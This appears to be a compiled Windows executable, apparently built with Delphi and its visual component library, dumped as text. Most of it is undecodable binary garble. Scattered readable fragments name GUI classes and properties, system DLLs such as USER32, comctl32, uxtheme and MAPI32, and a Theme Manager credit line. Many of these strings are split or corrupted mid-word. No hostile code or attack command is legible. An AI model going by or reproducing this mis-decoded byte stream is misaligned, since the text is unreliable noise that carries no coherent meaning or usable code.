�c ܻ1����ѹ��}� �� $!WZ1;�H|uI�0;E�%u>[Qv4KP�2��� �at��o 6���c�? �&���k�9��tA� �3A ��/�� �%��"%r���E�3۶!�84@ T@    �6P6`�}x��!L.-�j�B����P�M�I�3��S���P�Q��90 �1X�P/�!Q �����`��b`��#k!EP��Ш>@b>� ԍE
�PjGB�H � hb����+"�" �2�� ���LE�3�E�&a��1�P���# ݖ�N�	�ȉ ��] t[2�p2� )00� � ,��� `8h 6 ̥ Y�kQ���a�`� j�S: t�: 2
 z
 �ڣ Ib-�  /� �%�!Z��`W �"��Ë1=E ���5��*`y�H qC" �"�"P�����P$�ӣ �k �e� D`�D @ �  v��H�}�� � �%�@ � u`� >LB,V�����3�@F/TjS��U �4�  t.f�D$  f�$f�D$�D$K �u S�,  � ǋ;
���p^���s?���(��v.�� S�`�n �� ����6��GGuAR� �����,�'Y��� �]V�]�P�c& �K�>_�"��t ��d�ujB4P2" B�" ���"e ��e de �.�t�s� t�E�����  �΋�� 6N�^� zA$�x �
*j �8��!	 �  ~  �	 � � �
 �w�ׂ{��� V08�}� t D� �}�S�m|) Mb`" V ��H|��}V�= �11k= 1`N�1 j"	 7 G#�I��� H.u2����Ō*�<8�	� G4k ���B �A��� w(h
����=XtF p ��ǋ�Ql�Lm�I ���`0���F(��W�F,2�[�J��ls�2 �<�ĨSV�Iک"tI�4j��
��k h�I��X��5�vR�1 ;��nhn(�ay (�+(� F!	 �B!�FC4 4�F8 ��E�3ɺTIr(I �!3�=�Yֆ�u �0I�m0�Ȃ.s �R$�O��W "
/�4�
e<#� �1p�Ĥ�u�}
�Q��(Y9�����\�#�CUh{w�P;5�� u�u�[ ��`�M% �E�P�(C,����0��A 0(�@p!� � ����d&3���|�Hb��
�� �� �_� �D |<���2C(ePT��l�d����@1 ��7�0 VW�Ĭ�؀idA �ؿ�$�"X=RP� $n.�(V
�|($A^D$�t ���C,�&�g T�@V�!����t��T�U�%��؋s(��Zz�=�{2 hgA��E��~"�v� �$0� ) ��0�P�0� ��X��� �V* �N(��;� |3�����t8�E�c`[�3 j�
0�b 0i� &p� �� @�s��uj����{� "r�� �G�R(l �4 #3 ��1�z��$`�:��K!K`Wo��K��<F\:Ҹ 2  �G+P�G+G0��W���WFP�F 0 � O��0��]��fn ��_ s_ �H%� 4� ��&����B V Zb Z ���3��@�@
 � FA�:$u@�u �}� t9%0B% ���k ��BE  ^ ���"^(�~'�,���{q t��W�SR�ȋ.S x��/%�� �s�V�w�y����V,/ ��-u�9*u�xl t3�ð�� �؃{, u5�� �h (��U$�f�w���s,�^,�� F(�^4�F0z�<3�3^�7g��	 *� O�	� @�� �P��t;Pu�  �x0 u�.�	� �0P � A�8 <�` �YP�P@��uM �P0P�0Pb0C4=�ux,�0��� �I�2 Hr��E �Y�}����芢��8 e� �@<!X���
e�{� _�n�A!� <�C�CP�M�C$�Э � �.J �H�J�H@� f�J@�Jf�H�<  �sz(C��'C�!P@,A���F���5��6�!uZ!Po�!i�"@l�@)�6P�U��	P�U�(c}Ћ�o�PL0�PVlmFT�bj/ UD�* �U�- ��*���遀`PA(8�؀{2��{1 uM0�����LP��B�Fyl� %+ ��`G�V�F �z~F�C2�C1 (WU ���o(�0
 ��h/
 ��
 ,
��);EP,u f�M>A�� ���ȏ���"u��u_�aN��@��}q u'jV�\� ��jV�R
 ���E�U(��;؋����]q�	V�%���VN {x$A��G0]K��!�ً�f� �u��u
�Ё<�x �"�� �E�FX�T���f+�\ �}h��]��M�s�����(�@1p '@H�F"L}�;(rW~���&��Y+�G u��p� ���G)��Yl��&C�Cr��Xp�@E ����z�oG �U�Pp�	 �x,�	 ' "�Bt��'�h�glLh��R�L8$x ����2"�5)��@�Uh'��2d�]"�I�b3M (p"��b., >0�� �S s)�@2 �YY]��VWQ���Թ�S8�W�$,n�cZ�(��T�+!l�� f9�+-ȍ0U�D0� �S �}��E� �}� t�E@�$E���G ) 謦`,�������PX`B  L�U�����Y
c`�]ċ�A�Z衯Cð��P ��f�U�f�P  ����A M����U��R MP+u��EāL����& ��� �YW��ȃ�u/��V} R}$} f� BAM� Ɖ�X �&0��U�*�/E�n.q0��@�3��	gE��@������f�l5PU�jE�H��� E�f �{t��@���(u-f� Cf��t�  u�{u�U�O1!�ӓ�E�"�{ M3�9  �C �K � }�3����vF ��; 6��6 �C 3Ҋ����+�+&! �S�C� �F �C�&>  �K�C;�8v��U��ɐN���P��>�ӄ�r�]�#uiM�9��/��W���9;9p3U�l� �$&>>��e  ��/ �� B>)5�E�UA�v  ��v*� NU�	�

��к000 +  ůC�`)�U�Rj[	�$aj 8�}� u�S��(�":��'#S��s�G �}� tsQ�@0�d �E�0p| S ��8����=@�= �n"$ �E��R�,�,�A�E�}_ ��`t�}쒤��@��� GR�Uh�� %eQ �#�t���u�P�W ���-�Fz �`�B w��2���t# �b�w�v�� x  v�}� u�Hn ������d�3J&�{�J �z�z �!�E�	 �ED��1�E�	 $�(E���;� ��V�� B�� �`�ŝ0�����"��t@�E�Gȅ�ЋU�8-��8���&n�-��n���A��&�D$�P8���  p��5�b �*�c$��A"�<$BM���΃�$��, 1���d���� '��qs(;~��E��p} �Ax ��t�/TW�U���~u�6F� ;�l/
� ��a<�	$ Uhۆ2R�J �M�� o�9�鸵�������;�y�'hL�&U)�� �v���:�!�~(��!����!u
� G0��� �G09�� ��uh�G\	);G�'�m�	�T
 �[ �� `*+ M
W�o��WR�W"pR� ͋�+ ����E �GP�O�, ��:��
�wg�;G*ut 	d0d VW�w�SH_�?Eu��y	r �
�G���$�Tr W� �t`��# �G�_T��6 Y��)l"E��a t8��� � Ƈ��   T�N�V���R �QR Q(T0ڴ
w(�F0��<0�-�:�tN��!j��0j�f	 U$&�P���׋ǀ��вC(;x�A�����u�"F��ǌG.�{�� ��+� �0}p��`�2�;���H��b��ʒ�Fp�(������a�G�P���L���AN� �H �@�������C"��҈���!������q�y���a�"`,����% U�b �Y�XP�	0f� �F(�hl��{ �O�P$j6Z�����+�Xlp;�����>����$ &n(v$�^��UPR�L$�T$�[�}p t"y �f�E>�w!���L�@ @� ��$������p���r	���٧� P�F,�@P�E���D!$B *Ph ` ��!@<�D$�h 6`6 �EP�
; s"� u=�|$ uJ6
t0W-*� *#��c)�o. f�}>vW ��� � $���@ a�k:�(<$��VE�29� st'� tq�< �EPF!S� ��o 
O�E0\1Pf�T$"	 �	$:&�@qR(@ UV�T"$4:��� �Q;"��"U0��+�� �0�E@t�UX=P`� �Ep3Ɋ5��U*2* ~ �U,�MD q� ��,�$ �. S'���l?C����;P����P,����40�4Pm4P;�H��3�������>H���f�u<s2(V"��E����C,P�~����ޤ-��1ҍ-iy @�,%�+D� ��+$� P�Sޣ��@%h�h%腭( �F������B� ��~ J�# �Ew0
���CVW�� t����ͬ�P �Q��P��G!��=\�a��w(V 8ܢ� ǟ��4 d@�&  ���l�,.� �L0� (�b/�@)���P��# 4f,��t=,p �m�� t4 ���G	(���b$�G(�F(��(��`�V�	�/���1`P���`��	��Σ�j{(	� P�YG�����p!e�lk�xF�  t3�ð�TQ��2"�O�p�, �)j���iP� ��0SV��� ^(!�{[ b�C�D[��<� ԹCY �9F� f��rt�(��Y+� "j�F,P� CP�L$�A[�P�;���K ( ��� �"��|0 ������0 �^i���&���b���
 ;�u!�E��x��"��
U�ʷ0�	�� 0 �D�� �3�����֪.k �ݐ��,�E��C}�F�W� ��P˝��@r��p|Pu ���Z+�H�R~�	 P! ��e��� k�er�"�
]+4�# ��!�@y� �(��w��Ǹ0Q|bISZ�pܸp� p��xj��j�j���4�Mؼ$�/(w HY,��j����`��H(�y���P0á�F 蝢����,@�SV��D�*5Xݗ������ ��~�6 K6 �D`7pS����� �jZS�������F�9o����L�����=�C��ȳ' �>���t'�� PV�ڗtpT�Q  �\$(4V- �=�Ã!�8�4WjH�o Pj����� �أ0tF �l�F ��7�`�5� ,�u*���B �7" �� <`	�<p�`6 �&�l�r  �o�S�V�b�N�> �
  � �@ @:@* L P T H� �7@ � , �B TPat ternManagerSV�U8�;�FP��֭ Ɨ%Z ���U6�Q1@���8 -r�0fP,0�� #� � �^ 0^�������|�0�Ђ-	�E�������}� t ;XuB�pu�u6������}�?@����a ; �G�_�wU��mPM�Ox 'T� ��65��a ��@��Gډ���?	o ���P*�$�7@�4� 诮��-��@�����ٕ���� P�E��� ,��3�3��1��j�U S�)�3ۋ�@%}�yH���@�Ӂ�0J���B;¡*�� �����C ��	u�F��	u�*'����"���}�!�@5�^`E��E�0���o�`� ���ZB^qv .���ب^1����fsu }���8uc��L@�=�:��`"���PQ� �СY� g�7 x3� �!�"���P��* 2���5 ��m�J�0��
�
�
 耍��ڭ�-�- 
�
U�
�
�
�
�lP��h�*�
 �

 ��uF �%�m}~� \�m�@i 6a�� ��P����B-�����%��i@0�iP&
 	j�� �� 
j����� �h ���^@�� �
f�, �tb~>�f�`_���J ����K �b �G[� ��7 PP`W��B "�� ��; F�����  �� �� 2 ��;���e| �A٘�q�Q �<a� ��n�<Q��8�T�H  X �� T�
��A  4�A t�B  � `�A  TObjectList�h��  ����` �+$ �B  , TOrdereded  ��
  hTp h�`�` hPTStacnk�(V���.+�����F,Ft.�,��'֭��A��������W�ً��� �~���uR�iX �������};�
	4� �I�`@�PV��������� 7�Fh� �' ���{�=@�0 h\� �FpF# �0�JI������ �0���F CBJ���J�0@;�H �I��c�RP���� �鶣��r��%��F ���%�@U�@�@�@�@@� Rj�P����|@x@t@Up@l@h@d@U`@\@X@T@UP@L@H@D ��@���p���� ��¢�pt��r�b@��
K0W�KP��À�(� uv�=@$	tM��u1�=0 (�p0 � �襲� P�[ �ҕc{c P�FP�'�+�3� ��u����G�7x�v�x �@^h Mv�M �����W;(  x ��Get MonitorInfoAS�]�=�0 ��� j  ��b�SB� �7�Ȥ� ´��rtJtJ s@�i�3��	3������uS襂[�C�*� Syst emMetricrs��}� *�� #����<�i�W� �53��ǃ���u%~$�~j �0;~j@C~�B 4!]pQAFromhRG�=�^]�Pu� )� !������J���SV� �:���t�i�*V0�.� j�EԐ��ј
�E� � S��� ��(�`��Wind!ow(��=+aBQ�� ��D��W�u�uC� ���6�	*AB&� ��|$%a�}�} |+qE~�+!�+!p��Q��Poinpt�A�u�}�1,�A��������BVW� � n3ہ�kud`�>(r[j��Pj j0��?1H3�L�P� F�P�FV�~�u��^� F$�">Lrh@�� �F(P�M����� j1�@�  DISPLAY�� -�@X������s������.h� � :y�������.�@,Q������	{����7���+e<� � ����W���?$�/� .�`Q����*���E�PWĵ ���23��} ��
��E���`EW�mbE�e�C� ��E� � w����G �E�P����0� �����t6PW`� u$�} �u1��-�   p� 0 ��Vh��U�3A�4� En umDisplaByBs h��2�ƀl��������u��a
 A0d����
 ��Y��p��LD� �USER32.DLL$5��wh \&�F ��B`��ws�V�9l[E@�4@�L@ b@��\  IHelpSe@l�orD@  X���_� �� �Oy� :	"IntfsE4���880դ&6 S6�6 �4 ICustom�:Viewep0d�:�	p �< I Extended�>p�U f>�N@�<ISpeci6al#>p  >�	�| �@� Man6ag�@7�7 H
 r��� 14y`��7@ EkqExceptiond wdd��Pvd@��d��  U @T+qNode��̃���R �C �D$�5�m
0�
`�
���.��$%	01
�%�0y: ��D@��=
`G
 ��U�� � � � U� � � � �B � � U� � � � k� ��0 (3A��R' ,@�� K� �� 0 `�"p�_@ �� �Q`@ �l��BpA�Xp�V��$ x!mB� h�F -�  �.@/@ �% �S3ɉM��0U��+53҉���T�=<�%R|�� ��m ���M��ӡ
"�9�U�i
V���Ed�I ��$۶;��;+�[bY: +؅�v �-�h�qhP� ��t����H�S ��P 3�[�}ѮA^�����G���Km6 ��5.R 5�dǔ>|~ڑ|�y��|.�z ���|UP� P� �F$�Hi�7F�N�T P� �	 }����Q�S�^ ��!��D�C��� �s �V�ǒDQ$mn�� �0��B }\2���7$�M�HP��HpH08H �E�*�0>�>`�>P��>�>0�� C��ӪQC�%O �b� d̴��!�� �鞔X�b7�i�~����J�g y� ,�s�~����/� 0� ��@��G �XK��|bC� ��3Lp(FKu�.�1�)$U��1ʬ�as �~u0��3����B`�	��=C F�p�& =0���G(aA �$���`e`p�� @H��|DF@��E�.U��U��FqPt��  ��� �0�V<�E��M�u��, H~.0���O . �6�E�ӹ3�P�����a�� ������H�! ~)!�J��t1�p�����*�e����J �e`�e ���e|}e  2�032#����F��FQ3ۅG

�G$�B  �G� ��~Hu?� G�6��P�W���
f�EW
�	����L �j �� �.�S@�J=?0��?`?��?`+? �?`�`�! �,< ���DJ�3����,�tݫ��"�3� �]Љ]����U�RB�al�3�h���$������ �@m�������'0��|��"-A�u�G-܅�uH+��"��E��E��j �d��Q�������uX@U���Y� O�e� S
�T�/@��3~��y? G� ���U�e� #�R/R��E�R�MЋU�8"�WЋMO ��=��M�u܂ 诈��� ��;x tE%GS؏< �3�|J�a�!8#��M�0���U�� �$�^&�0&� �1~ �3b���E���D�(��� ��1b�<����B�]�]��GH���g}� 4t�Y�K �FB"u��T�5em!2fC�CA@F���
C
�������O�i �* �)� �[8 �u"P�" �"@<�Ku��`�( 3�y*3�h��S�`���>V(� >�+��8�-A�h�Q%
���ғ���#�u_1XC3��K���d� LDN�` � Lx50�	,D ��,404�GKu�ar�# .$q�.4��9 ��\��� QLS�Y��4 �[��b�t�C�s2  � �?' �@Ub, �< p ���[�	X!Q�x�%uc��c0�cp(}�qCq��@�� �f��t��!�D  U���4����#	 ?�	 �	 f	Vd&ׁ ������`q �H��J� �@%Y?���@ �SV�� ƋS$��(  X�W�k$�� |�F ����;xu
0����� �u�+��"��+��}+��+��+��R�+`SV�ɇy:������~�!F蘫��$��"� �BӀ��2 ������~ riH �*�O?��8�OusKt3��i+JaF+ ������-/�Hu�H�@6�|6 Ҋ60���-8`�8�BD�
�0w<M׳ D`�D �D�+D �=p� �E�k s7���H����	�]��)=t4 t(0(�h�q�����H�"h� S���
��8h� �xU� �l� e��h� � ���5H{�u
�o@ �h�!�!@L!P2�r! h$! y�!@P!Pdp! hU<! X!@T!PT!�hT! 7!@X!Pe\!hh! !@Y\!P��h|! +��!0`!P�!*h�! �!@d!P��!��comc tl32.dll�<Initial izeFlatS�/Uni�0_G etScrollProp,@S�Enable0B#ar0phow�`� Range�In#fo0�Pos�� ��@�`pP$C�M$Sh�\�� ��v�S�s�>*��8�C!�@  � �@ @:@* L P T H� �7@ � � �, � TS ynchroObject��d���   � d�
 �B 0 < T!Cr�calSc ion���NH����~�FP7�_Y?�! Y��2�}9@0 `�(u��E (EA$ 0 ��% lK% P��8�k�HPu}� �QP|��� ��ʅ�q�$�H����*BG�g=D  ~�	�=F@�h90(�[ �P���7	� �~ ���0�0�0�0��0�0�0�0��0�0�0�0��0�0�0�0Ī0�0�0�0Ԫ0�0�0�0�0�0�0�0��0�0�0 �0�0000�000 0$�0(0,0004�08 �AN��1
H�\� `��]��QS�t0�z���ن�;�cRC �y��J�N  �P�
�!h0�@��h@@}��hT@k�.hd@Y�`G��h�@5�,h�@#h��@h�@��"h�@�)hX�@�4h��0�?h@��Jh(@�U,hP@�`h`�@�khp@o�vh�@]�,h�@K�h��@9�h�@'��h�@�,h�@�h�@� �h�@b��h�0���h@��,h,@��h@�@��hT@��hl@s,h|@ah��@O&h�@=�1h�@+<,h�@Ghв@Rh�@��{
]#h�@�hh�0�shY$@�~h<@e��hT@���hh@��hY�@w�h�@re�W�E@z
ї�3N��D���E��uxtheme�(Ope!nTData Close�Dr aw BackgroundpTe8xt4 	#�ContentR� �PartS��PC0Ex-�Metrics\�Reg#�DHitTes Й��EdX(`Ic9  Is�`Defin|e4 @Gp�	ly Transparã �`Colo=PҰ0pS ng�olo�)PIN PEnumValu�,a;os�0PFV��_A�pargin4q�d Lishp ertyOri(   ��	Windo1h�ilenaЀy`s�P�Brush��� ��!��  �/A��#�QA	v�IsApp d,����:�2�ogIur�� H@�00H e0pp�#Aies4  �0 Cur N+DPDocum a��qQ��X ����1�Hv����t
���M��3�Ð�I$ä{w<& u!JY�2��=0�4�Ptk�+< ��#|ȧ9�	�-Cs��P�
�{����9p`qp�L�4�xM �{�y�nU�8�P8��8 �8��8`�8�T8��8 rf8�8`�8pX�8�  ��.8� ��%��F ���%�@�@U�@�@�@� �p@�p�\p��p �uzpp�`�8�`8�]�8 �8�8`�8�Kd8� �8N8��8`1 `m8�88 �8�8`i8�l8�p�8 �y8p��� �<�p (� X �iA 8"�A,-��A,-�(�B�m0 �A @�A   �A ��A (�  �A P< 8� 0 X �X hȭ 8 \ �+@    � ���� 0� H�B D  TCommon�!4������jA  0s�MK0  ���� C�D�U�   P Help('xt�& H" &�� On�'"pP "� Oln�/(n&�(n�! ���F0Vh@��f8���-F@1NT* 1ΐ0DMA@�F@{�m�5 3^�P 3N' �2 43ɋ;@t{�x8 t�ā� @8���  ����SVW ��؋{<� �t�FP����PW�C4��	�$F�	� ֋��r��`_`0t,VW�E����� �2�E���Q0�R��P�� �|  �U� �v� ��w�J ��1 �V� `� f����0�q�  ��f���� 3��8C�00p F<^��@���2 ���E����E!  �0 �E��/�e��P�P� @4P�@ �_� �}��'�'P�4wF V�ӉE�mcA�! ���m�G� BtG ��Vv�ݪ0`&x �� '� �E�P�&��E
��..(.� �E�^[��]� f�xJ t
��ЋCL�SH([�R`T�SBP V���g"� �ԍHA�
@B��u� �T$�Ha`Sj4�D$���h��P�l�� �4x���#�4e���� �@����B �  �D0$,E �E0$L8@E0dHE (D �E0$E D P �DC0$�E0$h[ E �E <�C X4 �D  ��C ��C  �E ��C ̃C � �E �C D !H� �C �H  \E ԑC   E p�C ��C D� �C ( �E  �&E ��C  p3E �6E -�5� �t  � ��C ht �> E �
D ���h TE �	�  E �DE ,E � �WE Kd� �Rx 9 ( @�� TMess&ag)
rm�@��bT�D ^�dF �6�Ĭ�Et�Ho4j G$G ǅ#T~j @� Pj j)�����(�E�P蹠8 ЋFh��Y6h4��M h�k��&d�X�V ��hÒX3jR W#��S�@ :Euf �>Cu������U�/pB ��
 *g �b1 �E������;Us��» ��#�^= ) H~�UhN�uPj �"c����[ U4h`3%>	@P h   �9���%�`��?� �0�����$@P
�}" �Y �\���H����Pj�~ ��`�= P P ��Hi&��e�ʹ ǝF � �q� �w� �S�<@-<�HF@ �	4y@ ��V�1 L1�U1 BSx4���NO�<!�<3ɉM� �M��M�M �M�M��M��M�V� A��P�M�I�-��m�U��E��$  �'��4e��O��|UG3�&�@  C � �k����t6�u� � �U��R��u�M�_ �|�_ �u�E�  �<_ FOu��@(m P�E�P3ɺ4 ��S�� �- �,� �����E��E�	�U�j ��d E��E��E� ���E��E!�* ��E�* 	�������. ��E��E�.P��E�.0��E@�
 �E��EB� P��E� 0��E�N ��	� %�@�ǘ� �E��k  ���� 0����ͨ ��0� ��:Yp�ɿ� � �2
  US&@ %s� �� YY*HPNo0�OK0 Cance�Ab7or�PR<$0PIgno�dPAlRl d ToP��00@@�Z�"� W3ۉ]��] ��]��]�f�M��U�OHlUՎc�$	�(���-	E�^G�1P4�p�1!XQ��Z  U�Rh��`��E�ƀ-�/U��T�/�� ��l"3 � ����j�]�Sj�~�;�j�u�V @n �jSj
!�a �jV QT �2�G �3۾|�	�E ��4��<w ���E�sh�> uY�$E��3ҡ����� 1�� 5�PjI��E��L���H9�	���YK	�� P�[�E�+ E�����;E�~� C �E������x�� sj衙��� E�Pj� �j �D��(� � ��y�3� W� ��N| -�� P�P,���65��� .�A� @� 3��E��<�Pu��E`�jx
�E�� � ��}� }�E̸�3T��
�6�6U�s@C� u�3@���]�� �H�m�؋J�O���I	!� ��L �U�U܋,E�P. �PƑ�$ ���� �
�(@H�@+, �� �,`�,�L,��, � }�t!�U���0�<� �T��W�%m�  �eG$Z����aQ \�M��D�� �����E���0,hWxp�� �h��}��Z覾� j �M�U�8���X\00�\ *VF ��� �X�d�c`
 h����<����� )�
 4��N�P_*0p+ u�u�u� ��f����Tf&�K- +E�+GHh�� �aP� . �0��� �E�t�E
��   *�  �T  ��a�a ÏA�E�3�yd|�~�E�������a�&�Wk�nt� ka hr�(���� 裼������B:]�u
1 �G:]�u
 �*�~4�� �� � M�M܋U`�]�QE�E� EȀ�
u��$�$  ��������#*��fBs��E��r�B�Y���i_��!bV�uIm�
@���J�-���MQ j�  f�M�8�)�� pQ�>M ( $0W$ ��5�SV( ��U��u�# ��U�����%��I��eU���U" <1�U��=	��|
� qV� � �,  }��}
��� �e6����� �)A�j #va��h5�!�@ �
������@�o�j RQ�f��7 �
�"Ü*���h A� +����`*h0x j �h�F �D $$�D$( �h� , 0 �L$$�D1 ~����! f"�8���0�c ommdlg_h�4GPFindRe place Wn dProcPtr%.8X  ږG =
� l�c� �~0�� ��0� �$@U� @� ($@J� \�0� 4�$@� �@d(%�H d�@D t�H@@ �@�<@�,b�2�p�Ju+f�= tf�	P�u	������1�!�o�ai�F ���z��< �-Ks3�X���jL8(�`DN����
@P��}�|�) �� ��O ���pT� � �2YQC /L���A /0H�� O��B (�C  �\ !�L�C |�� _8� X D0  ��C ��B ��C /ȋC K, T� �� �D (�C /���� �l  �t @h T�B   �����B ��B T$� ��@ �� *  ExtCtrl s P>C [�8TM . �  Alignx
EC a  �� 0��  5 Anchors �\�"  �B� AutoSize#y ��Be�  Center FC �
�@���� Co nstraint.s8� z& &P�� 
Drag Cursor�DC �! l� U%KyL# ] Q`��#0Mod� WP d P�#+  Enabl.ed"z� E�  Increm�� alDis�y�-�r ���p Par* ShowH� $B ���0*��  Picture(D |K �"�  	Popup
Menuo}F p�p� jpi
onal'�K ��� X KP �P�#xJ @J� Stretch"P{" X"� Transp� &�(�`� �P� VisiQ�UAV ��"@  OnClic,k�0r��) " oHxt!�K(% )� 
OnDblN �H�+� %� % D�*@% �! %�!�%POverpI�k %�" 	OnEndDock$m$�#$PL �p�i $�$ O nMouseDownTGC �" �&�%&`Move�L�" &�&p& UpDB p&���'�(grE0zK�! %�(oS
tart�(� �" &�)&p� �|Uބ���� � ^D�iD�� �Uh�B �|@�A��%l���  (�A��0  ����Time<r�| ��jA u��@Aj�5 ��d|" 0�" �"��9  EI�val�8# n�#��| �S V��t�����[��f�3 ҋ���+ �CP�E�$CP�
��hp����%�^�F���^$ ��f����pBZ�F �i[��u�@E � À}� t�L�n d����
�^[YX* �SV� �ڋ�$���,X Ӏ(����� ��~Q c& ^[ñ @�'�I��t	���	R$�� ÐSVWU����؋�L 5�t�@��� (�� � �*��
 Z	���  u���	��  ;4$
;|$��N0tz ��~v��~r �t$�D$�|$ �� �\$�;�} ,�4$�$�t$��J� ��G~G� * �QL ���2�e� z ~D�~D 0� .3��E���E�u�}���� "��G +Ǆ_ �PU �X�����P]��p+�S�E@���@t6�	 ��`\C�	��G/C
 3�J
  @H��P3�9"/N �(�|6 ��E�Ʈ �%�KZP��Y��SQ	0�>�MH�)N �i= �[U���R��.B]�	�,���P���A p�} W ty�E us��to�~" ti�� "� �u�F" �X�������6K��.6 tHB��k�t7 ��o tj 3ɺh b���j j h@�_
���Z��W!�h3W�M���z]�E�� t!�HG�c � ��f �
�0� f��rz  �EPS�EDnP�J ׋%�t ��F g �2 ��:��t� ���d	 Ë�VLS�^�:��(( O3(0:�T  P� �  SV<�؀{\ tFUC|q��
��~7@�0(�@^ P@j KD�S@���_0���������}�U��-u, z�0��� ��<&��9���!(�! ,�<$ &D�( ;CH|	 ;CL|��#CQP��0��# �K ���!"��2y� �Q-�"@u" R|�� ��2B� ��F[��DOQ>@X0/�F[t �
,s@$ �B ,s@(�EkR��U�C�������F@�F0�V"h����= F4�ƄۓV����P@� I@ �c薒F4�bmb�E�_ �E�w �L4���N3��K� u?�z df����$T|}	�3�p �� @���芤  �W��CP�CPVs$4	P蒈nC�"�h#ji�g ��g0	j�C, ��  s0@�{@  t:f�{: t3j V"@\���|u!�U��@����}3 M���ZA ����*Y)��e ��:_���鴦�@��0:P@t�P@�g���; P0t�P0�dW0� �U 8�U�P<�@  ]� Sf�x�� 
�ЋC<� S8[�h�F � tF @U@@@@U@@@@U@@@@u@�	 @@U@@@@U@@	@
@U@@@@J@��0�@�@�@�@�@��@�@�@�@��@�@�@�@��@� /�\yF \�B T T� L L D D� < < 4 4� , , $ $�    �    � �x� �B �� � � � � � � � Ԫ � � � Ī � � � �� � � � �� � � � �� � � � �� � | | t� t l l d� d \ \ T� T L L D� D < < 4� 4 , , $� $   �    �  �w F�� � � �  ����S���F u��" �����m��f���#0 ��+��H�(�-7s$$�dn蕣�`���������0��? �3�x}x��A a`�a aʲa���-j�8�8���
"�� �EM��ȰD �D�+s'h  � ���f$�� h����� �N(Delphi �O`Compon� �@jIE �P�̐P ���S�p�SV��� ��L 
���*u�&
X ���i� � l0J� �~0| ��@x �0@t  �\p �l� �@hH�0d�0H@�@ ��p�d4�
_q'  ��p'�@"'s�VxP�`���	,�W �`D�( `@y�`��0��Y �R0q��} }.� PU1�p�P���2�� D�g����&Wd��g gg@� 7�@�ľ� � 4y?��P ���� EReg istryExc eption���`��P�  ���`�	D�B 2 �
� 	TrPS �؅�t	�; \u�[ð[���t  B ��=�F�&ø t*3m��;�X[��0 `��% �F?  �F�H@�& ���9=@8 ͏�H�IX
�8��- � z��t!� { tP�NCz�P�V x C�C�1W��[�0��3;�t�{�P�+ �C �sX
�+dIW"��/ �� �CsL���7N ��P �H��� u�@Ë���4SV3ۉ]r�^�q	�qR�E���4G �E��c�؄�u �_4 4��G:��/� }� u*�E�P�FPjs�"�# P��s�� P�iy+� E��2�E�P�.* 0 4�	40P?4 %4`�}�  t0�~ � ���t�v"h$� �u�� ����fi	�M�-U�B ٻ !c* �' �����>O�v�E�^.��\�x;��w�E T�"@P�	��I� �G�E��& <;P!D�2 �M�3�E8�|y=�PV�� ��� �
�r@x�t$�}��E�� 0��5
����5
�tN�!� �	�0��0t�04�0��p
aG0 ��7c 0d7��4�MAPI32
.DLL�d}d���d�=�e  t"�P�G� �I� �]��h�m z�7U? g�X� B�X �=  t�=	 ��P��wW��W ysW@� ?X`�Xph 9` ��:Ɛ��l �
t�  U��,�, �!TConverRs-� �Format�T_��!�rtf�!txt �=u��J ���/����,Mcomctl�d llGS���M ���S[]��P8�з 8Q�H�=AP�_v�=b@P�K �D�����;]� �p+ �a�c 	��K�1�-g�� �
�  p���4�B � �@�pTTheme Services�\!'D   man ager � 2001,2 M ike Lisc hke b u Dt o n� c Dl c k o Tm" o x  e d i0 e p�0 r r& a �� a( l2 s�4 v e w m�
 n| p. g �p4 o Rs �\Ps� "l �ppZ �0htV wn: #"@tr T0[b@s� Ln� ��`r�tv �]t a4!"PPyT ]o( f e ��w� d* 0�=h$30�b�P\��'�W&E��7�Q����F ����=    ���FM�+"�7P. ���IE@- �eE%��W�A�g
' x7@�0 �~ t'3 ��Ã|�  u�������-j �耤
� �ЉD�B'�D�V�x t�x? �x u�h�d�j�ol�Schdl �3�[0H �ZP�MZ�� C��uݰ6����6��Ë�Ħ��}	����X(E��� �&��V�U�B ��,�h@�F �L�D�ԏ�P���D��D  �SV�M��UE�J�}A	)� g%!)J'�v�D @�JA���@ ����t��0�� ���@^[YY]� �� ���, rt��Af�>*� 	�T	IAx
�� +�B�Q����h�h���i���$�� �   		


  �    �    �    �   ! "#$%��B j�B { � U� � � � S� � �N U% 6 G X Ui z � � U� � � � U� d  $ U5 F T b Up ~ � � Y� � K��P �NQ]�?0���.0���0.��0x.��`  � ,��0P���0����0����0rL���0D���0 ��0��$s0�(b0��*4�Q0����@�04/0�80��<�0@���A��D�0H�0�E��	 ��0YP�0�TU�0X�0���0Y`w *�aYi :�[ �5�cM !�D�? "��U1 #f# �\�g�S%h����?�ļt�0$jB���b� �� t�����D9C�E��G� � �E��b� �|u�,�$# n# �3�Uh3�2d� "V�u؍}���^8xj��"��P�E1 �H �ta   tZj�i�j�	�j�j��E�P�H� @�y �P�U�+ ӋE�+ǋM��*q��g ��gPj�sA7���ur;��Q �0܃�`�0% xo���M̲(��L��j   =Q�� �:� ,E�(� ҅� ��B�	�5��&�؀{�������[ZCmHF@�*!@: @E�'�u:
�(?H��/ ���I:3ð  TTextLa
youtP D�� tlTop tlCenter�	 Bottom StdCtrls�8�L��p̨ � �T YC 8�AL*��A��;�C ���  �D (�C   �C �A  �C �C  |�C (�C AP< 8�A 0 @X �C ��C � �� �C ȋC ,  T�C ̃C A� ��C � PL HL ��C @ (�C ԑ�@ �C p� ��l  ��C h @ � |C   ���� �����C 0 H �  C � , TCusLabel��.M�
 Ba�|4�� � � ��D�D�T� ���@� 2
q' P>C [`bT��"  �  Alignh TA l ���q � 	  m�xEC�
 ��p0�$ Anchors �lmF j�FP  AutoSiz,e�i _E V�d`�E0 BiDiMode h R@Ap 0�#p Capt��G-��A �E�  Color FDC���Π�  �straints8z& �&P�
 
Dr agCursor�DC �! � %Kind^L# ] O�`�#0���:�P��@+ Enabled�X;`,N�� Focus� trol$
B} �4� CD�� F" h�� ��� P:ar�dQ)Z) ǭ)� )0H!&qYOj &� 
&0�tP�% �%�tPShowHq(D, |) �%�  	PopupMe+nuMp@� GAcce
lCha� �L ��u X��o@# �G \ �S #P  Transp� ��n �x� ! m�5GW�� ���" Visi��"oC �C�#  WordWrap�UA  # Ѐӂ$ OnClickN� ��% " gG&!�K(% )�& 
OnDblN �HC � %�'% ��Drop@% ��! %�(%POverpI�k %�)  	OnEndDock$  $�k*$PL ܓ�i �$�+ OnMo useDownTGC �" &�,�&`MoveL���&�-p& U'!���$�. $@Ex�'x# '�/'`Leave0K�D�'�0�Start�(" &�1�&p
